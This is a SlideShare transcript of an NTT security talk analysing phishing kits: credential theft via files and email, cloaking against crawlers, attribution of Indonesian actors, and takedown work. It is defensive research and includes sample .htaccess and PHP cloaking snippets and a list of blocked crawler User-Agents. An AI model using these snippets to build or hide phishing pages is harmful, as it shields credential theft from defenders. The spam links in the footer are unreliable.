SlideShare a Scribd company logo
1 of 52
Download to read offline
Copyright©2019 NTT corp. All Rights Reserved.
Catch Phish If You Can
A Case Study of Phishing Website and Actor
2019.05.15
Hirokazu Kodera & Manabu Niseki
Copyright(c)2019 NTT Corp. All Rights Reserved.
2Copyright©2019 NTT corp. All Rights Reserved.
• Manabu Niseki:
• Researcher, NTT Secure Platform Laboratories
• NTT-CERT
• FIRST TC Bali 2018 & Internet Week 2018 speaker
• Hirokazu Kodera:
• Researcher, NTT Secure Platform Laboratories
Who Are We?
3Copyright©2019 NTT corp. All Rights Reserved.
THE STATE OF PHISHING
4Copyright©2019 NTT corp. All Rights Reserved.
The State of Phishing
Source: http://docs.apwg.org/reports/apwg_trends_report_q4_2018.pdf/
APWG stats: 785,920 phishing sites in 2018
5Copyright©2019 NTT corp. All Rights Reserved.
How can we take
countermeasures?
6Copyright©2019 NTT corp. All Rights Reserved.
知己知彼
Know yourself,
know your enemy
孫子兵法 / The Art of War
7Copyright©2019 NTT corp. All Rights Reserved.
HOW TO CATCH PHISHES
8Copyright©2019 NTT corp. All Rights Reserved.
• Phishing kit:
• A kit to deploy a phishing website.
• It is possible to analyze a phishing website by
obtaining a phishing kit.
How to Catch Phishes
9Copyright©2019 NTT corp. All Rights Reserved.
Phishing actors make an OPSEC fail.
• e.g. paypal-support.big[.]com[.]my
How to Catch Phishes
10Copyright©2019 NTT corp. All Rights Reserved.
Phishing kit collecting methods:
1. Subscribing & generating feeds
2. Enumerating phishy URLs
3. Crawling the phishy URLs
• An open directory website enables to download a
phishing kit.
How to Catch Phishes
Phishing Kits
Subscribe feeds
• OpenPhish
• PhishTank
Generate feeds
• CT logs
• New domains
Phishy URLs
11Copyright©2019 NTT corp. All Rights Reserved.
INSIDE PHISHING KITS:
HOW TO STEAL CREDENTIALS
12Copyright©2019 NTT corp. All Rights Reserved.
How phishing kits steal credentials?
• Two major ways:
• Writing credentials to a local file.
• Sending credentials to an actor’s email address.
Inside Phishing Kits
13Copyright©2019 NTT corp. All Rights Reserved.
Inside Phishing Kits
Writing credentials to lolo.txt
14Copyright©2019 NTT corp. All Rights Reserved.
Inside Phishing Kits
Sending credentials to myloginbox@protonmail.com
15Copyright©2019 NTT corp. All Rights Reserved.
Stats of email providers abused by actors
Inside Phishing Kits
0 500 1000 1500 2000 2500 3000 3500 4000
mail.ru
aol.com
zoho.com
protonmail.com
mail.com
outlook.com
hotmail.com
yandex.com
yahoo.com
gmail.com
count
16Copyright©2019 NTT corp. All Rights Reserved.
INSIDE PHISHING KITS:
HOW TO CLOAK
17Copyright©2019 NTT corp. All Rights Reserved.
• Some of phishing sites include a cloaking
function.
• Implemented with .htaccess and PHP
• Cloaking targets:
• IP address
• User-Agent
• HTTP Referer
Cloaking Function of Phishing Kits
Phishing site
User Crawler
A Normal user can access to the phishing site, while a crawler can’t access to it.
18Copyright©2019 NTT corp. All Rights Reserved.
• Implementation example with .htaccess and
PHP
Cloaking Function of Phishing Kits
RewriteEngine on
RewriteCond %{HTTP_REFERER} example¥.com [NC,OR]
RewriteCond %{HTTP_REFERER} www¥.example¥.com
RewriteRule ^.* - [F,L]
RewriteEngine on
order allow,deny
deny from 192.0.2.0/24
deny from 198.51.100.0/24
deny from example.com
deny from env=stealthed
allow from all
Implementation example with .htaccess
Access with Referer example.com or www.example.com,
then the access will be denied.
<?php
if(strops(_$SERVER[‘HTTP_USER_AGENT’],’crawler’) or
strops(_$SERVER[‘HTTP_USER_AGENT’],’bot’) ){
header(‘HTTP/1.0 404 Not Found’);
exit;
}
?>
Implementation example with PHP
Accessed with User-Agent crawler or bot,
then the access will be denied.
19Copyright©2019 NTT corp. All Rights Reserved.
• How to analyze a cloaking function in a phishing
kit?
1. Deploy a phishing kit on the Web server in the closed
environment.
2. Send HTTP requests with multiple conditions of HTTP
header to a phishing kit.
• User-Agent and Referer
3. Observe HTTP responses from a phishing kit.
Dynamic Analysis Against Phishing Kits
Analysis tool
Phishing kit deployed
on Web server
User-Agent: testbot
User-Agent: Bot
HTTP/1.1 200 OK
HTTP/1.1 403 Forbidden
User-Agent Referer
Closed environment
20Copyright©2019 NTT corp. All Rights Reserved.
• About 12.9% of phishing kits have a cloaking
function against User-Agent or Referer.
• Analyzed phishing kits: 4,917
• Include cloaking function: 636
• Not include cloaking function: 4,281
• Respond “403 Forbidden”, “404 Not Found”.
• Redirect to a legitimate site or a search engine.
Dynamic Analysis Against Phishing Kits
12.9
%
87.1
%
No Cloaking Function
Cloaking Fucntion
Redirect to Phishing Target
google.com Dropbox, Apple
yahoo.com PayPal
www.linkedin.com LinkedIn
www.paypal.com PayPal
www.gov.uk UK Revenue
Customs Agency
www.asb.co.nz ASB Bank
Summary of redirection to legitimate sites.Ratio of cloaking function
Redirect to
search engines
Redirect to
legitimate sites
21Copyright©2019 NTT corp. All Rights Reserved.
• It is identifiable whether a phishing kit has a cloaking
function or not by sending 13 patterns of HTTP
request.
• Analyzed 636 phishing kits which includes cloaking function.
• 86.6% of phishing kits block a HTTP request with "Surfbot"
User-Agent.
• The result indicates a connection of phishing actors. The
cloaking techniques may be shared with phishing actors.
Dynamic Analysis Against Phishing Kits
HTTP
Header
Parameter
User-Agent Surfbot
Referer spamcop.net
User-Agent imo-google-robot-intelink
User-Agent AdsBot-Google
Referer http://http://safebrowsing-
cache.google.com/
User-Agent ASPSeek
User-Agent HSFT - LVU Scanner
HTTP
Header
Parameter
Referer altavista.com
Referer google.com.ar
User-Agent CoolBot
User-Agent DISCo Pump 3.2
User-Agent NetZip Downloader
User-Agent tor-exit
22Copyright©2019 NTT corp. All Rights Reserved.
• How to check whether a phishing site has a
cloaking function?
1. Access to a phishing site with HTTP header patterns
analyzed in the previous step.
2. Observe HTTP response from a phishing site.
Phishing Sites Including Cloaking Function
Analysis Tool Phishing Site A
GET http://example.jp/phishing.php
User-Agent: Surfbot
GET http://example.com/fake.php
User-Agent: Surfbot
HTTP/1.1 403 Forbidden
HTTP/1.1 200 OK
1. User-Agent: Surfbot
2. Referer: spamcop.net
13. User-Agent: tor-exit
HTTP Header Patterns
GET http://example.com/fake.php
Referer: spamcop.net
HTTP/1.1 200 OK
GET http://example.com/fake.php
User-Agent: tor-exit
HTTP/1.1 200 OK
Phishing Site B
Phishing Site A has
cloaking function
Phishing Site B doesn’t have
cloaking function
23Copyright©2019 NTT corp. All Rights Reserved.
• 10.4% of phishing sites have a cloaking
function.
• The number of accessed phishing site URLs: 4,901
• Some phishing sites may be not enable access control
implemented with .htaccess.
Phishing Sites Including Cloaking Function
10.4
%
89.6
%
No Cloaking Function
Cloaking Fucntion
Ratio of cloaking function
Analysis Tool
Phishing Kit which
have cloaking func.
User-Agent: testbot
User-Agent: testbot
HTTP/1.1 403 Forbidden
HTTP/1.1 200 OK
Closed Environment
Phishing Site
Phishing site doesn’t deny access
though same phishing kit has cloaking function
Download Kit
24Copyright©2019 NTT corp. All Rights Reserved.
• Some phishing kits have a cloaking function
which makes analysis more difficult
• IP address which connected to a phishing site is added
to .htaccess file dynamically.
• Access to the same phishing site again, the second access
is redirected to legitimate site.
Characteristic Cloaking Function
Redirect the second
connection to PayPal.
• We need to care the cloaking function when
researching phishing sites.
25Copyright©2019 NTT corp. All Rights Reserved.
WHO DID IT?
26Copyright©2019 NTT corp. All Rights Reserved.
Signature / Credits Analysis
Th3 Exploiter
27Copyright©2019 NTT corp. All Rights Reserved.
Signature / Credits Analysis
Ak47-VbV
28Copyright©2019 NTT corp. All Rights Reserved.
Signature / Credits Analysis
Shadow Z118
29Copyright©2019 NTT corp. All Rights Reserved.
• Signature / credits analysis makes possible
to trace out phishing actors.
• OSINT techniques:
• Username check:
• Check User Names, Knowem, Pipl
• Domain and IP research:
• RiskIQ, SecurityTrails, VirusTotal
• Googling
Signature / Credits Analysis
30Copyright©2019 NTT corp. All Rights Reserved.
• Indonesian phishing actors:
• RSJKINGDOM (a.k.a DarkLight)
• DevilScream (a.k.a Z1coder)
• Spammer ID
• Others:
• Hijaiyh(a.k.a justalinko), IDHAAM69, Indonesian Darknet
and more.
Chasing Indonesian Actors
31Copyright©2019 NTT corp. All Rights Reserved.
CHASING INDONESIAN ACTORS:
RSJKINGDOM
32Copyright©2019 NTT corp. All Rights Reserved.
• RSJKINGDOM:
• A developer of phishing kits targeting PayPal & Apple
RSJKINGDOM
33Copyright©2019 NTT corp. All Rights Reserved.
RSJKINGDOM
RSJKINGDOM
DarkLight
34Copyright©2019 NTT corp. All Rights Reserved.
RSJKINGDOM
35Copyright©2019 NTT corp. All Rights Reserved.
RSJKINGDOM
36Copyright©2019 NTT corp. All Rights Reserved.
RSJKINGDOM
37Copyright©2019 NTT corp. All Rights Reserved.
CHASING INDONESIAN ACTORS:
DEVILSCREAM
38Copyright©2019 NTT corp. All Rights Reserved.
• DevilScream:
• A developer of an infamous phishing kit “16shop”.
DevilScream
39Copyright©2019 NTT corp. All Rights Reserved.
DevilScream
Riswanda
devilscream
Z1coder
40Copyright©2019 NTT corp. All Rights Reserved.
DevilScream
Total: 768 domains (2019/03)
41Copyright©2019 NTT corp. All Rights Reserved.
• GitHub as a C2 (since 16shop v2)
DevilScream
42Copyright©2019 NTT corp. All Rights Reserved.
• Attribution by Phishing AI:
DevilScream
Source: https://twitter.com/PhishingAi/status/1011688773610979328/
43Copyright©2019 NTT corp. All Rights Reserved.
CHASING INDONESIAN ACTORS:
SPAMMER ID
44Copyright©2019 NTT corp. All Rights Reserved.
Spammer ID
RSJKINGDOM’s profile picture on Kongknow
45Copyright©2019 NTT corp. All Rights Reserved.
Spammer ID
46Copyright©2019 NTT corp. All Rights Reserved.
• Spammer ID runs various services:
• arakatestore[.]com
• HTML to PDF Converter
• Encrypt text with HTML Hidden Characters
• carder[.]io
• BIN checker
• spmr[.]us
• URL shortener
• spammer[.]me
• OCR reader, Priv8 tools and etc.
Spammer ID
47Copyright©2019 NTT corp. All Rights Reserved.
COUNTERMEASURES WE’VE TAKEN
48Copyright©2019 NTT corp. All Rights Reserved.
• Reporting phishing websites:
• To Google Safe Browsing
• To hosting providers
• Sharing a repot with LEAs & CSIRT/CERTs.
Countermeasures We’ve Taken
49Copyright©2019 NTT corp. All Rights Reserved.
CONCLUSIONS
50Copyright©2019 NTT corp. All Rights Reserved.
• You can get phishing kits by leveraging
OSINT.
• The cloaking function in phishing kits makes
it difficult to analyze.
• But you can bypass it by knowing how it works.
• You can take practical countermeasures
against phishing attacks by analyzing
phishing kits.
Conclusions
51Copyright©2019 NTT corp. All Rights Reserved.
ANY QUESTIONS?
52Copyright©2019 NTT corp. All Rights Reserved.
• References:
• DeepEnd Research: Indonesian Spam Communities
• http://www.deependresearch.org/2018/09/indonesian-
spam-communities.html
• NetSecOps: Analysis of Phishing mail. Drone bought
from Apple
• http://netsecops.info/bought-a-drone-from-apple-really/
References

More Related Content

Similar to Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor

Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...NoNameCon
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Leaving Passwords Behind (Software Design & Development 2019)
Leaving Passwords Behind (Software Design & Development 2019)Leaving Passwords Behind (Software Design & Development 2019)
Leaving Passwords Behind (Software Design & Development 2019)Scott Brady
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposedtamfin
 
Crafting enhanced customer experience through chatbots, beacons and oracle jet
Crafting enhanced customer experience through chatbots, beacons and oracle jetCrafting enhanced customer experience through chatbots, beacons and oracle jet
Crafting enhanced customer experience through chatbots, beacons and oracle jetRohit Dhamija
 
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDATop OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDANowSecure
 
Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"
Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"
Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"Jishnu Pradeep
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Ping Identity
 
PyConWeb - 2019 Auditing websites & apps for privacy leaks.
PyConWeb - 2019 Auditing websites & apps for privacy leaks.PyConWeb - 2019 Auditing websites & apps for privacy leaks.
PyConWeb - 2019 Auditing websites & apps for privacy leaks.Konark modi
 
Using Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyUsing Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyHorea Porutiu
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdNipun Jaswal
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionYury Leonychev
 
Advanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioAdvanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioShunsuke Miyoshi
 
Session2 2 김휘강 codegate2(hkkim)
Session2 2 김휘강 codegate2(hkkim)Session2 2 김휘강 codegate2(hkkim)
Session2 2 김휘강 codegate2(hkkim)Korea University
 
POC 2018 - whatever talk_ Let's go OSINT using DeepWeb
POC 2018 - whatever talk_ Let's go OSINT using DeepWebPOC 2018 - whatever talk_ Let's go OSINT using DeepWeb
POC 2018 - whatever talk_ Let's go OSINT using DeepWebDASOM KIM
 
Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...Priyanka Aash
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...PROIDEA
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxsanap6
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxinstaeditz009
 
Financial Grade OAuth & OpenID Connect
Financial Grade OAuth & OpenID ConnectFinancial Grade OAuth & OpenID Connect
Financial Grade OAuth & OpenID ConnectNat Sakimura
 

Similar to Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor (20)

Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Leaving Passwords Behind (Software Design & Development 2019)
Leaving Passwords Behind (Software Design & Development 2019)Leaving Passwords Behind (Software Design & Development 2019)
Leaving Passwords Behind (Software Design & Development 2019)
 
Phishing exposed
Phishing exposedPhishing exposed
Phishing exposed
 
Crafting enhanced customer experience through chatbots, beacons and oracle jet
Crafting enhanced customer experience through chatbots, beacons and oracle jetCrafting enhanced customer experience through chatbots, beacons and oracle jet
Crafting enhanced customer experience through chatbots, beacons and oracle jet
 
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDATop OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
Top OSS for Mobile AppSec Testing: The Latest on R2 and FRIDA
 
Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"
Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"
Paper Presentation - "Your Botnet is my Botnet : Analysis of a Botnet Takeover"
 
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
Standard Based API Security, Access Control and AI Based Attack - API Days Pa...
 
PyConWeb - 2019 Auditing websites & apps for privacy leaks.
PyConWeb - 2019 Auditing websites & apps for privacy leaks.PyConWeb - 2019 Auditing websites & apps for privacy leaks.
PyConWeb - 2019 Auditing websites & apps for privacy leaks.
 
Using Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyUsing Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain Transparency
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
Advanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with IstioAdvanced Security on Kubernetes with Istio
Advanced Security on Kubernetes with Istio
 
Session2 2 김휘강 codegate2(hkkim)
Session2 2 김휘강 codegate2(hkkim)Session2 2 김휘강 codegate2(hkkim)
Session2 2 김휘강 codegate2(hkkim)
 
POC 2018 - whatever talk_ Let's go OSINT using DeepWeb
POC 2018 - whatever talk_ Let's go OSINT using DeepWebPOC 2018 - whatever talk_ Let's go OSINT using DeepWeb
POC 2018 - whatever talk_ Let's go OSINT using DeepWeb
 
Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on..." Breaking Extreme Networks WingOS: How to own millions of devices running on...
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
Financial Grade OAuth & OpenID Connect
Financial Grade OAuth & OpenID ConnectFinancial Grade OAuth & OpenID Connect
Financial Grade OAuth & OpenID Connect
 

More from REVULN

Yono REKSOPRODJO, Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...
Yono REKSOPRODJO,  Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...Yono REKSOPRODJO,  Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...
Yono REKSOPRODJO, Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...REVULN
 
Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...
Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...
Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...REVULN
 
Isao MATSUNAMI - Digital security in japanese journalism
Isao MATSUNAMI - Digital security in japanese journalismIsao MATSUNAMI - Digital security in japanese journalism
Isao MATSUNAMI - Digital security in japanese journalismREVULN
 
Chung-Jui LAI - Polarization of Political Opinion by News Media
Chung-Jui LAI - Polarization of Political Opinion by News MediaChung-Jui LAI - Polarization of Political Opinion by News Media
Chung-Jui LAI - Polarization of Political Opinion by News MediaREVULN
 
Stewart MACKENZIE - The edge of the Internet is becoming the center
Stewart MACKENZIE - The edge of the Internet is becoming the centerStewart MACKENZIE - The edge of the Internet is becoming the center
Stewart MACKENZIE - The edge of the Internet is becoming the centerREVULN
 
Masayuki HATTA - Debunking toxic "Matome sites" in Japan
Masayuki HATTA - Debunking toxic "Matome sites" in JapanMasayuki HATTA - Debunking toxic "Matome sites" in Japan
Masayuki HATTA - Debunking toxic "Matome sites" in JapanREVULN
 
Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...
Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...
Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...REVULN
 
Rachel BLUNDY - Overview of AFP Fact Check
Rachel BLUNDY - Overview of AFP Fact CheckRachel BLUNDY - Overview of AFP Fact Check
Rachel BLUNDY - Overview of AFP Fact CheckREVULN
 
Dominic WAI - When would using a computer be a crime?
Dominic WAI - When would using a computer be a crime?Dominic WAI - When would using a computer be a crime?
Dominic WAI - When would using a computer be a crime?REVULN
 
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...REVULN
 
Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...
Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...
Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...REVULN
 
Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...
Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...
Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...REVULN
 

More from REVULN (12)

Yono REKSOPRODJO, Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...
Yono REKSOPRODJO,  Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...Yono REKSOPRODJO,  Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...
Yono REKSOPRODJO, Fahmy YUSUF - Information Warfare in Cyberspace: The Sprea...
 
Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...
Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...
Mei NELSON - Hacking and Trolling: The Changing Face of Hacktivism in the Dis...
 
Isao MATSUNAMI - Digital security in japanese journalism
Isao MATSUNAMI - Digital security in japanese journalismIsao MATSUNAMI - Digital security in japanese journalism
Isao MATSUNAMI - Digital security in japanese journalism
 
Chung-Jui LAI - Polarization of Political Opinion by News Media
Chung-Jui LAI - Polarization of Political Opinion by News MediaChung-Jui LAI - Polarization of Political Opinion by News Media
Chung-Jui LAI - Polarization of Political Opinion by News Media
 
Stewart MACKENZIE - The edge of the Internet is becoming the center
Stewart MACKENZIE - The edge of the Internet is becoming the centerStewart MACKENZIE - The edge of the Internet is becoming the center
Stewart MACKENZIE - The edge of the Internet is becoming the center
 
Masayuki HATTA - Debunking toxic "Matome sites" in Japan
Masayuki HATTA - Debunking toxic "Matome sites" in JapanMasayuki HATTA - Debunking toxic "Matome sites" in Japan
Masayuki HATTA - Debunking toxic "Matome sites" in Japan
 
Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...
Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...
Sebastien BOURDEAUDUCQ, Stewart MACKENZIE - A talk about nothing (How to crea...
 
Rachel BLUNDY - Overview of AFP Fact Check
Rachel BLUNDY - Overview of AFP Fact CheckRachel BLUNDY - Overview of AFP Fact Check
Rachel BLUNDY - Overview of AFP Fact Check
 
Dominic WAI - When would using a computer be a crime?
Dominic WAI - When would using a computer be a crime?Dominic WAI - When would using a computer be a crime?
Dominic WAI - When would using a computer be a crime?
 
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
Yi-Lang Tsai - Cyber Security, Threat Hunting and Defence Challenge in Taiwan...
 
Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...
Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...
Dr. Rolando Rivera Lansigan - The Privacy Act of 2012, its compliance and imp...
 
Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...
Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...
Dr. Da-Yu Kao - The Investigation, Forensics, and Governance of ATM Heist Thr...
 

Recently uploaded

Conf42-LLM_Adding Generative AI to Real-Time Streaming Pipelines
Conf42-LLM_Adding Generative AI to Real-Time Streaming PipelinesConf42-LLM_Adding Generative AI to Real-Time Streaming Pipelines
Conf42-LLM_Adding Generative AI to Real-Time Streaming PipelinesTimothy Spann
 
Advanced Machine Learning for Business Professionals
Advanced Machine Learning for Business ProfessionalsAdvanced Machine Learning for Business Professionals
Advanced Machine Learning for Business ProfessionalsVICTOR MAESTRE RAMIREZ
 
Vision, Mission, Goals and Objectives ppt..pptx
Vision, Mission, Goals and Objectives ppt..pptxVision, Mission, Goals and Objectives ppt..pptx
Vision, Mission, Goals and Objectives ppt..pptxellehsormae
 
INTERNSHIP ON PURBASHA COMPOSITE TEX LTD
INTERNSHIP ON PURBASHA COMPOSITE TEX LTDINTERNSHIP ON PURBASHA COMPOSITE TEX LTD
INTERNSHIP ON PURBASHA COMPOSITE TEX LTDRafezzaman
 
Semantic Shed - Squashing and Squeezing.pptx
Semantic Shed - Squashing and Squeezing.pptxSemantic Shed - Squashing and Squeezing.pptx
Semantic Shed - Squashing and Squeezing.pptxMike Bennett
 
Thiophen Mechanism khhjjjjjjjhhhhhhhhhhh
Thiophen Mechanism khhjjjjjjjhhhhhhhhhhhThiophen Mechanism khhjjjjjjjhhhhhhhhhhh
Thiophen Mechanism khhjjjjjjjhhhhhhhhhhhYasamin16
 
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)
Call Us ➥97111√47426🤳Call Girls in Aerocity (Delhi NCR)jennyeacort
 
20240419 - Measurecamp Amsterdam - SAM.pdf
20240419 - Measurecamp Amsterdam - SAM.pdf20240419 - Measurecamp Amsterdam - SAM.pdf
20240419 - Measurecamp Amsterdam - SAM.pdfHuman37
 
Predictive Analysis for Loan Default Presentation : Data Analysis Project PPT
Predictive Analysis for Loan Default  Presentation : Data Analysis Project PPTPredictive Analysis for Loan Default  Presentation : Data Analysis Project PPT
Predictive Analysis for Loan Default Presentation : Data Analysis Project PPTBoston Institute of Analytics
 
Learn How Data Science Changes Our World
Learn How Data Science Changes Our WorldLearn How Data Science Changes Our World
Learn How Data Science Changes Our WorldEduminds Learning
 
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...
NLP Data Science Project Presentation:Predicting Heart Disease with NLP Data ...Boston Institute of Analytics
 
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort service
9711147426✨Call In girls Gurgaon Sector 31. SCO 25 escort servicejennyeacort
 
Identifying Appropriate Test Statistics Involving Population Mean
Identifying Appropriate Test Statistics Involving Population MeanIdentifying Appropriate Test Statistics Involving Population Mean
Identifying Appropriate Test Statistics Involving Population MeanMYRABACSAFRA2
 
RABBIT: A CLI tool for identifying bots based on their GitHub events.
RABBIT: A CLI tool for identifying bots based on their GitHub events.RABBIT: A CLI tool for identifying bots based on their GitHub events.
RABBIT: A CLI tool for identifying bots based on their GitHub events.natarajan8993
 
科罗拉多大学波尔得分校毕业证学位证成绩单-可办理
